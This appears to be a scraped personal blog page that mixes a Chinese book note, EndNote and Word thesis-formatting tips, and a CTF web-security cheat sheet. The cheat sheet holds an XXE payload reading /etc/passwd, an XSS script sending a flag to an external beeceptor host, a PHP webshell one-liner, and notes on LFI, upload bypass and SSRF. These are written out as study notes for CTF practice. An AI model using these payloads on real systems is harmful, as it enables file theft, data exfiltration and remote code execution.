A Mitmproxy-based Dynamic Vulnerability Detection System For Android Applications
A Mitmproxy-based Dynamic Vulnerability Detection System For Android Applications
A&D of Network Security - Lab 4(ARP & DNS SPOOFING)
A&D of Network Security - Lab 4(ARP & DNS SPOOFING)
傾城之戀 短篇小說集一 1943年
傾城之戀【張愛玲百歲誕辰紀念版】:短篇小說集一 1943年
- 作者: 張愛玲
- 出版社: 皇冠
- 出版日期: 2020/02/17

這一本書集合了八篇張愛玲的短篇小說,而傾城之戀只是其中一篇,截至目前看到的為止,都旨在講述女性在封建制度的社會巨輪下,在愛情中做出好像有選擇的選擇,通篇開頭都是用講述故事的口吻,用一炷香的時間,詳細卻又富含文學的筆觸打開細思即恐的人生篇章
Trapa Interview
Trapa Interview
寫論文參考的工具或影片
寫論文參考的工具或影片
Endnote
- 如何將WORD中插入的書目匯出至EndNote?
- EndNote搭配Word撰文時,Library與Word檔案間關係的FAQ?
- 為何修改引用文獻沒動靜?請檢查EndNote與Word顯示的Record Number,並確認有無Traveling Library
- 和Word Equation Block有關的
- 善用Word與EndNote協助論文編排(七):公式標號與交互參照
- 善用Word與EndNote協助論文編排(八):圖表標號與交互參照
- How to Use AutoText in Microsoft Word
- Create Automatic Numbered Equations in Word Part 4 – Making Display Mode
-
endnote一定要在論文最後面才可以使用嗎,我想要在論文最後面加入appendix,但後面最新加入的reference,會變成{test, 2024 #95},如何解決 :::spoiler Ans: 在 EndNote 中,參考文獻(References) 一般是放在論文最後,但如果你在 References 之後加了 Appendix,EndNote 可能會出現 {test, 2024 #95} 這種未解析的引用標記。這通常是因為 Word 中的 Cite While You Write (CWYW) 沒有正確更新。 解決方法: 方法 1:確保 EndNote 正確更新引用
1
2
3在 Word 中,點擊 EndNote 插件 → Convert to Unformatted Citations,這會把所有引用變成 {Author, Year #ID} 格式。 然後,點擊 Update Citations and Bibliography,讓 EndNote 重新整理引用。 檢查 References 是否仍然正確,如果 Reference 正確但 Appendix 內的引用還是 {test, 2024 #95},試試 方法 2。 ::: - 如何打開Endnote超連結?善用Word與EndNote協助論文編排(十六):較易辨識文中引註
- 如果原本是使用Word後來用Overleaf的人,可能會想要把Endnote中所有的reference都轉換成bib的格式,可以參考EndNote書目匯出至LaTeX使用
Word
Table
- [研究生入門] 論文中「表」的製作
- 如何快速建立Word特定表格樣式(論文三線表)
- word標題編號變黑色方塊-最速解法-
- Word方程式換行對齊等號
- 如何新增Appendix在Reference後,並且插入圖表的標號後,是從Appendix標號開始
開始之前建議先看完如何搞定 Word 最讓人抓狂的功能 - 多層次清單/樣式? | Word 教學 #27
:::info
目標與限制:
- 因為我的圖表目錄的”標題標籤”是Fig./Table,也就是說只有Fig.或Table的標籤才會被更新在圖目錄,因此創一個Fig. A這個新標籤是無法解決我的問題,因此一定要使用Fig.這個標籤
- 那如果要使用Fig.這個標籤,我的目標是可以自動變成Fig. <appendix>.<num>,所以我就要讓word可以辨識<appendix>這個章節編號,但是word只會辨識標題1到標題9 ::: 解決方式是自己摸索出來的,不確定是不是正確但總之可以暫時解決我的問題。因為論文的template本身已經建立好”標儀1,2,3”還有”標題”這四種樣式,也設定好多層次清單,甚至也綁定了樣式與多層次清單,所以我的做法就是定義新的多層次清單,並且把原本是”Chapter 1”的layer,替換成”Appendix A”,然後選擇將變更套用至→插入點之後,就可以了,詳細如下
- 先從Reference的頁面往下enter一個新的page,從樣式中可以知道目前套用的是”標題”
- 先把目前的樣式改為”標題1”
- 設定新的多層次清單
- 改掉原本Chapter 1的layer,並且選擇將變更套用至→插入點之後,設定縮排都為0公分(置中之後再手動設定)
- 測試
分別新增Appendix A以及Appendix B,在插入標號,會發現標號已經變成Fig. A.1和Fig. B.1
Ctrl+A全選後F9會發現不論是Appendix還是圖目錄,都已經正確顯示
Pseudocode
Equation
- 如果要使用latex中的cases,目前看下來唯一的方法就是直接插入word內建的括號
- 如果會出現打$\mathcal{E}A$
\mathcal{E}_A會莫名其妙變成$\mathcal{E}\mathcal{A}$\mathcal{E}_\mathcal{A},那就不要一次把latex code全部貼上去,先打\mathcal{E}確認沒問題,再打_A,word就會自己判斷了 - 如果要使用argmin/argmax,又想要用latex打,可以直接打
{\rm argmax}\belowi{k}這樣就可以了
可能有用的Paper
Static
TeamT5筆試題目筆記
TeamT5筆試題目筆記
Crypto Cheat Sheet
Crypto Cheat Sheet
Simple Welcome 0x02 & 0x05(Lab - Nine & Nine-Revenge)
Simple Welcome 0x02 & 0x05(Lab - Nine & Nine-Revenge)
Simple Crypto - 0x02(Random Number Generator - LCG)
Simple Crypto - 0x02(Random Number Generator - LCG)
TSCCTF 2024
TSCCTF 2024
AIS3 EOF 2024
AIS3 EOF 2024
Web Cheat Sheet
Web Cheat Sheet
解題重點
robots.txt- 掃port: nmap:
$ sudo apt install net-toolsNMAP教學- nmap:
$ nmap <url>
- nmap:
- 封包headers和contents: Wireshark、Browser、BurpSuite
- cookies
- Information Leak
-
.DS_Store: lijiejie/ds_store_exp -
gitleak: denny0223/scrabble
-
Injection
- SQLi
- XXE - Payload Cheat Sheet
1
2
3<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <data><ID>&xxe;</ID></data> - XSS - CheatSheet
1
2
3
4
5
6</script><script> fetch(`/getflag\) .then(r=>r.text()) .then(flag=>location.href=`https://sbk6401.free.beeceptor.com/?f=${flag}` ) </script> - Command Injection - feifei Cheat Sheet
- SSTI - Payload Cheat Sheet:
- 用tplmap直接打
其他
- LFI: 只是能讀取到victim server上的file content,不見得會有價值,需要搭配其他手法,例如
- 寫入webshell之類的達到RCE
- 利用PHP的偽協議達到讀特殊檔案的需求
http://victim.io/?page=php://filter/convert.base64-encode/resource=<file path>
- Deserialization
- 前端: 攻擊者沒有直接攻擊受害者,而是把惡意程式植入到受害者會瀏覽的網頁,當受害者瀏覽該網頁時,就會自動執行惡意程式,並把受害主機的一些資料送回給駭客,可能是利用beeceptor這樣的外部server(這是其中一種受害方式,也可能很直接的被盜取
COOKIE之類的) - SSRF: create一個偽造的payload和一個對外的中間server溝通,並讓這個中間server因為我的偽造payload而同意讓我和更裡面的內網server溝通,這樣我就打到inner server,如果有preview card這樣的網站要特別注意有沒有SSRF的問題
- 利用gopher協議建一個偽造payload
- 上傳:
- 如果沒有任何保護: 直接upload webshell.php(
<?php system($_GET["sh"]); ?>)達到RCE - 如果有保護但只看extension: 那就偽造extension後夾帶webshell達到RCE(
webshell.png.php) - bypass
IMAGETYPE(加入合法的File Signature) + bypass file type(修改封包header)
- 如果沒有任何保護: 直接upload webshell.php(
- 如果是WordPress網頁: WpScan專門檢測WordPress類型的網頁,有哪些漏洞,前期可以掃描出WP版本、安裝的theme或是插件有哪些、安全漏洞等等